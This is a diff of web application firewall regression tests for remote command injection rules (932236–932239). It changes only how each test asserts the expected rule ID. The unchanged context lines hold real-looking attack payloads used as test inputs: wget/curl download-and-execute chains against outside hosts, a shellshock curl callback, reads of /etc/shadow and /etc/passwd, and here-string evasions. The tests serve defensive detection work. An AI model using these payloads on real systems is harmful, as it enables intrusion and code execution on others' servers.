@@ -379,7 +400,8 @@ tests: uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages:
@@ -398,7 +420,8 @@ tests: data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages:
@@ -417,7 +440,8 @@ tests: data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 25 desc: Positive test - RCE passed in one of the args stages:
@@ -437,7 +461,8 @@ tests: arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages:
@@ -456,7 +481,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages:
@@ -475,7 +501,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages:
@@ -494,7 +521,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages:
@@ -513,7 +541,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages:
@@ -532,7 +561,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages:
@@ -551,7 +581,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages:
@@ -570,7 +601,8 @@ tests: data: "arg=%26%2359%3B+;top" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages:
@@ -589,7 +621,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages:
@@ -608,7 +641,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages:
@@ -627,7 +661,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages:
@@ -646,7 +681,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages:
@@ -665,7 +701,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 38 desc: "Unix command injection" stages:
@@ -681,7 +718,8 @@ tests: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 39 desc: "Unix command injection" stages:
@@ -697,7 +735,8 @@ tests: data: "var=`cut crs312``dig 34test`" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 40 stages: - input:
@@ -711,7 +750,8 @@ tests: uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" version: "HTTP/1.1" output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 41 stages: - input:
@@ -726,7 +766,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages:
@@ -743,7 +784,8 @@ tests: uri: "/get?foo=time+curl+coreruleset.org" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages:
@@ -760,7 +802,8 @@ tests: uri: "/get?foo=ti''me+curl+coreruleset.org" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 44 desc: "FP with word comment" stages:
@@ -775,7 +818,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 45 desc: "FP with word settings" stages:
@@ -790,7 +834,8 @@ tests: uri: "/get?args=settings" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 46 desc: False positive against "time" stages:
@@ -808,7 +853,8 @@ tests: data: "var=hello; time he came" version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 47 desc: False positive against "more" stages:
@@ -826,7 +872,8 @@ tests: data: "var=a hero; more than" version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 48 desc: "FP with word environment" stages:
@@ -841,7 +888,8 @@ tests: uri: "/get?args=environment" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 49 desc: "FP with word performance" stages:
@@ -856,7 +904,8 @@ tests: uri: "/get?args=performance" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 50 desc: "Block execution of env command with arguments" stages:
@@ -872,7 +921,8 @@ tests: data: "args=env --version" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 51 desc: "Block execution of perf command with arguments" stages:
@@ -888,7 +938,8 @@ tests: data: "args=perf --version" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 52 desc: "Block evasion using here string" stages:
@@ -905,7 +956,8 @@ tests: data: | code=;`cat<<<ifconfig` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 53 desc: "Block evasion using here string with space" stages:
@@ -922,7 +974,8 @@ tests: data: | code=;`cat<<< ifconfig` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 54 desc: "Block evasion using here string with single quotes" stages:
@@ -939,7 +992,8 @@ tests: data: | code=;`cat<<<'ifconfig'` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 55 desc: "Block evasion using here string with double quotes" stages:
@@ -956,7 +1010,8 @@ tests: data: | code=;`cat<<<"ifconfig"` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 56 desc: "Block evasion using here string with command substitution" stages:
@@ -973,7 +1028,8 @@ tests: data: | code=;`cat<<<$(ifconfig)` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 57 desc: "Block `time` prefix" stages:
@@ -990,7 +1046,8 @@ tests: data: | code=time ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 58 desc: "Block `strace` prefix" stages:
@@ -1007,7 +1064,8 @@ tests: data: | code=strace ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 59 desc: "Known false positive with `Cut` at start of string (expected failure)" stages:
@@ -1024,7 +1082,8 @@ tests: data: | sentence=Cut orange quarters into crosswise slices about 1/8-inch thick. output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 60 desc: "Known false positive with `Wall` at start of string (expected failure)" stages:
@@ -1041,7 +1100,8 @@ tests: data: | sentence=Wall Street\\xe2\\x80\\x99s benchmark stock index struck an all-time high on Tuesday. output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 61 desc: "Known false positive with `Mount` at start of string (expected failure)" stages:
@@ -1058,7 +1118,8 @@ tests: data: | sentence=Mount Airy basketball coach Bryan Hayes lectures his team during a third-quarter timeout. output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 62 desc: "Fixed false positive with `As` at start of string" stages:
@@ -1075,7 +1136,8 @@ tests: data: | sentence=As you near your last year of trick or treating, though, sometimes jokes aren't enough. output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 63 desc: "Fixed false positive with `At` at start of string" stages:
@@ -1092,7 +1154,8 @@ tests: data: | sentence=At any moment we can make a decision to change. output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 64 desc: "Block `nohup` prefix" stages:
@@ -1109,7 +1172,8 @@ tests: data: | code=nohup ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 65 desc: "Block ad-hoc ansible commands" stages:
@@ -1126,7 +1190,8 @@ tests: data: | code=ansible all -m ping output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 66 desc: "Block ansible config dump command" stages:
@@ -1143,7 +1208,8 @@ tests: data: | code=ansible-config dump output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 67 desc: "Block installing collections from ansible galaxy" stages:
@@ -1160,7 +1226,8 @@ tests: data: | code=ansible-galaxy collection install community.general output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 68 desc: "Block ad-hoc ansible commands using ansible-console" stages:
@@ -1177,7 +1244,8 @@ tests: data: | code=ansible-console output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 69 desc: "Block ansible-doc command" stages:
@@ -1194,7 +1262,8 @@ tests: data: | code=ansible-doc plugin ping output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 70 desc: "Block dumping ansible inventory file and variables" stages:
@@ -1211,7 +1280,8 @@ tests: data: | code=ansible-inventory --list output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 71 desc: "Block ansible pull from remote repository" stages:
@@ -1228,7 +1298,8 @@ tests: data: | code=ansible-pull --url example.com output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 72 desc: "Block decrypting ansible secrets" stages:
@@ -1245,7 +1316,8 @@ tests: data: | code=ansible-vault decrypt secret output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 73 desc: "Block execution of ansible playbooks" stages:
@@ -1262,7 +1334,8 @@ tests: data: | code=ansible-playbook site.yml output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 74 desc: "Block decryption of secrets with chef-vault" stages:
@@ -1279,7 +1352,8 @@ tests: data: | code=chef-vault -i secret output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 75 desc: "Block execution of chef-shell command" stages:
@@ -1296,7 +1370,8 @@ tests: data: | code=chef-shell output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 76 desc: "Block execution chef recipie book" stages:
@@ -1313,7 +1388,8 @@ tests: data: | code=chef-run all recipie.rb output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 77 desc: "Block execution chef recipie book against a specific node" stages:
@@ -1330,7 +1406,8 @@ tests: data: | code=chef-client -t 1.1.1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 78 desc: "Block execution chef command" stages:
@@ -1347,7 +1424,8 @@ tests: data: | code=chef report nodes output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 79 desc: "Block execution of visudo" stages:
@@ -1364,7 +1442,8 @@ tests: data: | code=visudo output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 80 desc: "Block execution of CrowdSec cscli" stages:
@@ -1381,4 +1460,5 @@ tests: data: | code=cscli alerts list output: - log_contains: id "932236" + log: + expect_ids: [932236]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
index 4b3e14f8f..3676f2a3a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -15,7 +15,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 2 stages: - input:
@@ -29,7 +30,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 3 stages: - input:
@@ -43,7 +45,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 4 stages: - input:
@@ -57,7 +60,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 5 stages: - input:
@@ -71,7 +75,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 6 stages: - input:
@@ -86,7 +91,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 7 stages: - input:
@@ -101,7 +107,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 8 stages: - input:
@@ -116,7 +123,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 9 stages: - input:
@@ -131,7 +139,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 10 stages: - input:
@@ -146,7 +155,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 11 desc: "9323HNQU - should not be detected at PL 2" stages:
@@ -163,7 +173,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 12 desc: "9323HNQU - should not be detected at PL 2" stages:
@@ -180,7 +191,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 13 desc: "FP with word comment" stages:
@@ -195,7 +207,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932237" + log: + no_expect_ids: [932237] - test_id: 14 desc: "FP with word settings" stages:
@@ -210,7 +223,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932237" + log: + no_expect_ids: [932237] - test_id: 15 stages: - input:
@@ -225,7 +239,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 16 stages: - input:
@@ -239,7 +254,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 17 desc: "Block env command with arguments" stages:
@@ -254,7 +270,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 18 desc: "Block env command with arguments" stages:
@@ -270,7 +287,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 19 desc: "Block ad-hoc ansible commands" stages:
@@ -285,7 +303,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 20 desc: "Block ansible config dump command" stages:
@@ -300,7 +319,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 21 desc: "Block installing collections from ansible galaxy" stages:
@@ -315,7 +335,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 22 desc: "Block ad-hoc ansible commands using ansible-console" stages:
@@ -330,7 +351,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 23 desc: "Block ansible-doc command" stages:
@@ -345,7 +367,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 24 desc: "Block dumping ansible inventory file and variables" stages:
@@ -360,7 +383,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 25 desc: "Block ansible pull from remote repository" stages:
@@ -375,7 +399,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 26 desc: "Block decrypting ansible secrets" stages:
@@ -390,7 +415,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 27 desc: "Block execution of ansible playbooks" stages:
@@ -405,7 +431,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 28 desc: "Block decryption of secrets with chef-vault" stages:
@@ -420,7 +447,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 29 desc: "Block execution of chef-shell command" stages:
@@ -435,7 +463,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 30 desc: "Block execution chef recipie book" stages:
@@ -450,7 +479,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 31 desc: "Block execution chef recipie book against a specific node" stages:
@@ -465,7 +495,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 32 desc: "Block execution chef command" stages:
@@ -480,7 +511,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 33 desc: "Block execution of visudo" stages:
@@ -495,7 +527,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 34 desc: "Block execution of CrowdSec cscli" stages:
@@ -510,4 +543,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
index 5bbd8705b..1bf4cbecd 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
@@ -18,7 +18,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 2 desc: "9323HNQU" stages:
@@ -35,7 +36,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 3 desc: "Block evasion using here string" stages:
@@ -52,7 +54,8 @@ tests: data: | code=;`cat<<<who` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 4 desc: "Block evasion using here string with space" stages:
@@ -69,7 +72,8 @@ tests: data: | code=;`cat<<< who` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 5 desc: "Block evasion using here string with single quotes" stages:
@@ -86,7 +90,8 @@ tests: data: | code=;`cat<<<'who'` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 6 desc: "Block evasion using here string with double quotes" stages:
@@ -103,7 +108,8 @@ tests: data: | code=;`cat<<<"who"` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 7 desc: "Block evasion using here string with command substitution" stages:
@@ -120,7 +126,8 @@ tests: data: | code=;`cat<<<$(who)` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 8 desc: "Block `time` prefix" stages:
@@ -137,7 +144,8 @@ tests: data: | code=time who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 9 desc: "Block `strace` prefix" stages:
@@ -154,7 +162,8 @@ tests: data: | code=strace who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 10 desc: "Block `nohup` prefix" stages:
@@ -171,4 +180,5 @@ tests: data: | code=nohup who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
index f692a7779..99fb9ae84 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
@@ -21,7 +21,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 2 desc: "Unix RCE in request headers - uppercase" stages:
@@ -36,7 +37,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 3 desc: System Command Injection (932239) from old modsec regressions stages:
@@ -55,7 +57,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages:
@@ -74,7 +77,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 5 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages:
@@ -92,7 +96,8 @@ tests: uri: "/post" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages:
@@ -112,7 +117,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages:
@@ -132,7 +138,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages:
@@ -151,7 +158,8 @@ tests: uri: "/post" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 9 desc: "False negative report - user agent" stages:
@@ -166,7 +174,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 10 desc: "Negative test on known user-agent" stages:
@@ -183,7 +192,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 11 desc: "Negative test on known user-agent" stages:
@@ -200,7 +210,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 12 desc: "Negative test on known user-agent" stages:
@@ -217,7 +228,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 13 desc: "Negative test on known user-agent" stages:
@@ -234,7 +246,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 14 desc: "Negative test on known user-agent" stages:
@@ -251,7 +264,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 15 desc: "Negative test on known user-agent" stages:
@@ -268,7 +282,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 16 desc: "Negative test on known user-agent" stages:
@@ -285,7 +300,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 17 desc: "Negative test on known user-agent" stages:
@@ -302,7 +318,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 18 desc: "IXMZUXBG" stages:
@@ -317,7 +334,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 19 desc: "IXMZUXBG" stages:
@@ -333,7 +351,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 20 desc: "FP with word comment" stages:
@@ -348,7 +367,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 21 desc: "FP with word settings" stages:
@@ -363,7 +383,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 22 desc: "FP with word environment" stages:
@@ -378,7 +399,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 23 desc: "FP with word environment" stages:
@@ -394,7 +416,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 24 desc: "FP with word performance" stages:
@@ -409,7 +432,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 25 desc: "FP with word performance" stages:
@@ -425,7 +449,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 26 desc: "Block execution of env command with arguments" stages:
@@ -440,7 +465,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 27 desc: "Block execution of env command with arguments" stages:
